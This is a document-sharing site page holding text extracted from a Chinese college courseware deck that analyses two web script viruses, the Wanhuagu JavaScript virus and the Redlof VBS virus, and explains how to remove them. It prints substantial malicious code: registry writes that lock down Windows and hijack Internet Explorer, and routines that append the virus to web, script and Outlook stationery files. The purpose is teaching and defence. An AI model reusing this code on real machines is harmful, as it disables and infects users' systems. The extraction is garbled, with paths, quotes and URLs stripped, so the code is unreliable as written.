典型网页病毒剖析课件.ppt
- 【下载声明】
1. 本站全部试题类文档,若标题没写含答案,则无答案;标题注明含答案的文档,主观题也可能无答案。请谨慎下单,一旦售出,不予退换。
2. 本站全部PPT文档均不含视频和音频,PPT中出现的音频或视频标识(或文字)仅表示流程,实际无音频或视频文件。请谨慎下单,一旦售出,不予退换。
3. 本页资料《典型网页病毒剖析课件.ppt》由用户(三亚风情)主动上传,其收益全归该用户。163文库仅提供信息存储空间,仅对该用户上传内容的表现方式做保护处理,对上传内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知163文库(点击联系客服),我们立即给予删除!
4. 请根据预览情况,自愿下载本文。本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
5. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007及以上版本和PDF阅读器,压缩文件请下载最新的WinRAR软件解压。
- 配套讲稿:
如PPT文件的首页显示word图标,表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
- 特殊限制:
部分文档作品中含有的国旗、国徽等图片,仅作为作品整体效果示例展示,禁止商用。设计者仅对作品中独创性部分享有著作权。
- 关 键 词:
- 典型 网页 病毒 剖析 课件
- 资源描述:
-
1、Virus重庆电子工程职业学院重庆电子工程职业学院计算机病毒与防治课程小组教学单元3-4 网页脚本病毒防治 万花谷病毒的手工清除 万花谷病毒特点及代码分析 梅丽莎病毒特点及代码分析第二讲第二讲 典型网页病毒剖析典型网页病毒剖析计算机病毒与防治课程小组 梅丽莎病毒的手工清除万花谷病毒特点计算机病毒与防治课程小组病毒类型 网页脚本病毒危险级别 影响系统 Win 9X/ME/NT/2000/XP/2003Win 9X/ME/NT/2000/XP/2003 万花谷病毒特点病毒名称:万花谷万花谷病毒特点计算机病毒与防治课程小组曾经在互连网上散发过一个美丽诱人的网址“万花谷”,这实际是一个恶意“陷阱”,有
2、人经不住诱惑,只用鼠标轻轻点一下,计算机就立即瘫痪了,这是有人利用Java最新技术进行破坏的一个恶意网址。本病毒是在页面中嵌入了恶意的JavaScript代码,它最初出现在 http:/ 个人网站上,随后其他一些个人主页也模仿或被感染了该病毒代码。万花谷病毒特点万花谷病毒特点计算机病毒与防治课程小组其破坏特性如下:(1)用户不能正常使用WINDOWS的DOS功能程序;(2)用户不能正常退出WINDOWS;(3)开始菜单上的关闭系统、运行等栏目被屏蔽,防止用户重新以DOS方式启动,关闭DOS命令、关闭REGEDIT命令等。(4)将IE的浏览器的首页和收藏夹中都加入了含有该有害网页代码的网络地址。
3、具体的表现形式是:(1)网络地址是:;(2)在IE的“收藏夹”中自动加上“万花谷”的快捷方式,网络地址是:http:/;万花谷病毒特点万花谷病毒源码分析计算机病毒与防治课程小组document.write();function AddFavLnk(loc,DispName,SiteURL)var Shor=Shl.CreateShortcut(loc+DispName+.URL);Shor.TargetPath=SiteURL;Shor.Save();function f()Try /ActiveX initialization a1=document.applets0;a1.setCLSID
4、(F935DC22-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Shl=a1.GetObject();a1.setCLSID(0D43FE01-F093-11CF-8940-00A0C9054228);a1.createInstance();FSO=a1.GetObject();a1.setCLSID(F935DC26-1CF0-11D0-ADB9-00C04FD58A0B);a1.createInstance();Net=a1.GetObject();万花谷病毒源码分析计算机病毒与防治课程小组try if(documents.cookie
5、s.indexOf(Chg)=-1)/以下内容是对注册表进行修改Shl.RegWrite(HKCUSoftwareMicrosoftInternet ExplorerMainStart Page,http:/ expdate=new Date(new Date().getTime()+(1);documents.cookies=Chg=general;expires=+expdate.toGMTString()+;path=/;/设置IE主页Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun,
6、01,REG_BINARY);/消除RUN按纽Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoClose,01,REG_BINARY);/消除关闭按纽Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff,01,REG_BINARY);/消除注销按纽Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoD
7、rives,63000000,REG_DWord);/隐藏盘符万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystemDisableRegistryTools,00000001,REG_DWORD);/禁止注册表编辑器Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop,00000001,REG_DWORD);/屏蔽所有桌面图标Shl.RegWrite(HKCUSo
8、ftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled,00000001,REG_DWORD);/禁止运行Dos程序Shl.RegWrite(HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppNoRealMode,00000001,REG_DWORD);/屏蔽所有桌面图标Shl.RegWrite(HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption,您的计算机已经被http:/
9、hack.org/优化:));/设置开机提示Shl.RegWrite(HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText,您的计算机已经被http:/hack.org/优化:));/弹出窗口中的内容万花谷病毒源码分析计算机病毒与防治课程小组Shl.RegWrite(HKLMSoftwareMicrosoftInternet ExplorerMainWindow Title,新的标题http:/ ExplorerMainWindow Title,新的标题http:/ var expdate=new Date(new
10、Date().getTime()+(1);documents.cookies=Chg=general;expires=+expdate.toGMTString()+;path=/;catch(e)catch(e)function init()setTimeout(f(),1000);init();万花谷病毒发作现象计算机病毒与防治课程小组万花谷病毒发作部分现象截图未中万花谷病毒时截图万花谷病毒手工清除计算机病毒与防治课程小组方法一(利用 Windows 提供的恢复注册表功能):在“开始-运行”中输入Regedit命令,打开注册表编辑器,点选“文件”菜单下的“导入”命令,选择以前备份的注册表文件
11、,确定即可完成注册表的还原。方法二(采用 VBS 或 JS 脚本来删除或修改注册表项):进入系统后打开记事本,输入以下内容:万花谷病毒手工清除计算机病毒与防治课程小组Dim R Set R=CreateObject(WScript.Shell)Rem Write Regedit R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoRun,0,REG_BINARY ;修复RUN按纽R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExp
12、lorerNoClose,0,REG_BINARY ;修复关闭按纽R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoLogOff,0,REG_BINARY ;修复注销按纽R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDrives,00000000,REG_DWORD ;取消隐藏盘符R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSyst
13、emDisableRegistryTools,00000000,REG_DWORD;取消禁止注册表R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesExplorerNoDesktop“,”00000000“,”REG_DWORD“;万花谷病毒手工清除R.RegWrite HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesWinOldAppDisabled,00000000,REG_DWORD R.RegWrite HKCUSoftwareMicrosoftWindowsCu
14、rrentVersionPoliciesWinOldAppNoRealMode,00000000,REG_DWORD R.RegWrite HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeCaption,REG_SZ R.RegWrite HKLMSoftwareMicrosoftWindowsCurrentVersionWinlogonLegalNoticeText,REG_SZ ;重设开机提示R.RegWrite“HKLMSoftwareMicrosoftInternet ExplorerMainWindowTitl
15、e”,“”,REG_SZ ;重设IE标题R.RegWrite HKCUSoftwareMicrosoftInternet ExplorerMainStartPage,REG_SZ“以文件名“RegClean.vbs”存盘后双击运行该文件。重新启动计算机即完成系统恢复。计算机病毒与防治课程小组新欢乐时光病毒特点病毒名称:新欢乐时光病毒类型:网页脚本病毒危险级别:影响系统:Win 9X/ME/NT/2000Win 9X/ME/NT/2000 英文名包括有:HTML.Redlof.A Symantec,VBS.Redlof AVP,VBS_REDLOF.A Trend,VBS/Redlof-A So
16、phos,VBS.KJ 金山,Script.RedLof 瑞星,VBS/KJ 江民计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒特点新欢乐时光病毒是一个多变形、加密病毒,感染扩展名为.html,.htm,.asp,.php,.jsp,.htt和.vbs文件,同时该病毒会大量生成folder.htt和desktop.ini,并在%windir%System中生成一个名字叫Kernel.dll(Windows 9x/Me)或kernel32.dll(Windows NT/2000)的文件,修改.dll文件的打开方式,感染Outlook的信纸文件。感染这个病毒后有两个明显的特征:a.在每个
17、目录中都会生成folder.htt(带毒文件)和desktop.ini(目录配置文件);b.电脑运行速度明显变慢,在任务列表中可以看到有大量的Wscript.exe程序在运行。计算机病毒与防治课程小组新欢乐时光病毒特点新欢乐时光病毒这个网页病毒利用微软IE的漏洞,通过感染一些.html,.htm,.asp,.php,.jsp,.htt和.vbs等文件进行传播。然而由于病毒的本身特性,其传播的途径也有多种:a.通过网页传播。由于病毒会感染网页文件,如果那些网站站长不小心将带毒的网页放到网站上,用户不小心浏览了这些网页就会被病毒感染了;b.通过局域网。当本地计算机设有可写权限的共享目录,或者访问局
18、域网上带毒的计算机的时候就会感染病毒;对于Windows NT/2000系统,由于存在默认的管理用共享目录,因此,管理员的疏忽也可能会造成感染。c.通过电子邮件。如果发件人使用了带毒的网页文件作为信纸,或者信件中有带毒的网页文件,那么,只要收件人浏览了邮件,也会被感染病毒;d.通过移动介质,如软盘、移动硬盘、光盘等。由于病毒会生成folder.htt和desktop.ini,所以在打开移动介质或打开其文件夹的时候,就会激活并感染病毒。计算机病毒与防治课程小组新欢乐时光代码分析Dim InWhere,HtmlText,VbsText,DegreeSign,AppleObject,FSO,WsSh
19、ell,WinPath,SubE,FinalyDisk Sub KJ_start()初始化变量 KJSetDim()初始化环境 KJCreateMilieu()感染本地或者共享上与html所在目录 KJLikeIt()通过vbs感染Outlook邮件模板 KJCreateMail()进行病毒传播 KJPropagate()End Sub 计算机病毒与防治课程小组新欢乐时光病毒主运行程序代码新欢乐时光代码分析Function KJAppendTo(FilePath,TypeStr)On Error Resume Next 以只读方式打开指定文件 Set ReadTemp=FSO.OpenText
20、File(FilePath,1)将文件内容读入到TmpStr变量中 TmpStr=ReadTemp.ReadAll 判断文件中是否存在“KJ_start()”字符串,若存在说明已经感染,退出函数;若文件长度小于1,也退出函数。If Instr(TmpStr,KJ_start()0 Or Len(TmpStr)1 Then ReadTemp.Close Exit Function End If 如果传过来的类型是“htt“,在文件头加上调用页面的时候加载KJ_start()函数;在文件尾追加html版本的加密病毒体。如果是”html”:在文件尾追加调用页面的时候加载KJ_start()函数和ht
21、ml版本的病毒体;如果是vbs:在文件尾追加vbs版本的病毒体 If TypeStr=htt Then ReadTemp.Close Set FileTemp=FSO.OpenTextFile(FilePath,2)FileTemp.Write&vbCrLf&TmpStr&vbCrLf&HtmlText 函数功能:向指定类型的指定文件追加病毒计算机病毒与防治课程小组FileTemp.Close Set FAttrib=FSO.GetFile(FilePath)FAttrib.attributes=34 Else ReadTemp.Close Set FileTemp=FSO.OpenTextF
22、ile(FilePath,8)If TypeStr=html Then FileTemp.Write vbCrLf&vbCrLf&vbCrLf&HtmlText ElseIf TypeStr=vbs Then FileTemp.Write vbCrLf&VbsText End If FileTemp.Close End If End Function 新欢乐时光代码分析计算机病毒与防治课程小组新欢乐时光代码分析计算机病毒与防治课程小组函数功能:改变子目录以及盘符Function KJChangeSub(CurrentString,LastIndexChar)判断是否是根目录 If LastIn
23、dexChar=0 Then 如果是根目录:如果是C:,返回FinalyDisk盘,并将SubE置为0 如果不是C:,返回将当前盘符递减1,并将SubE置为0 If Left(LCase(CurrentString),1)=LCase(c)Then KJChangeSub=FinalyDisk&:SubE=0 Else KJChangeSub=Chr(Asc(Left(LCase(CurrentString),1)-1)&:SubE=0 End If Else 如果不是根目录,则返回上一级目录名称 KJChangeSub=Mid(CurrentString,1,LastIndexChar)En
24、d If End Function 新欢乐时光代码分析计算机病毒与防治课程小组Function KJCreateMail()On Error Resume Next 如果当前执行文件是html的,就退出函数 If InWhere=html Then Exit Function End If 取系统盘的空白页的路径ShareFile=Left(WinPath,3)&Program FilesCommon FilesMicrosoft SharedStationeryblank.htm 如果存在这个文件,就向其追加病毒体,否则生成含有病毒体的文件 If(FSO.FileExists(ShareFi
25、le)Then Call KJAppendTo(ShareFile,html)Else Set FileTemp=FSO.OpenTextFile(ShareFile,2,true)FileTemp.Write&vbCrLf&vbCrLf&HtmlText FileTemp.Close End If 功能:感染邮件部分 新欢乐时光代码分析计算机病毒与防治课程小组 取得当前用户的ID和OutLook的版本 DefaultId=WsShell.RegRead(HKEY_CURRENT_USERIdentitiesDefault User ID)OutLookVersion=WsShell.RegR
展开阅读全文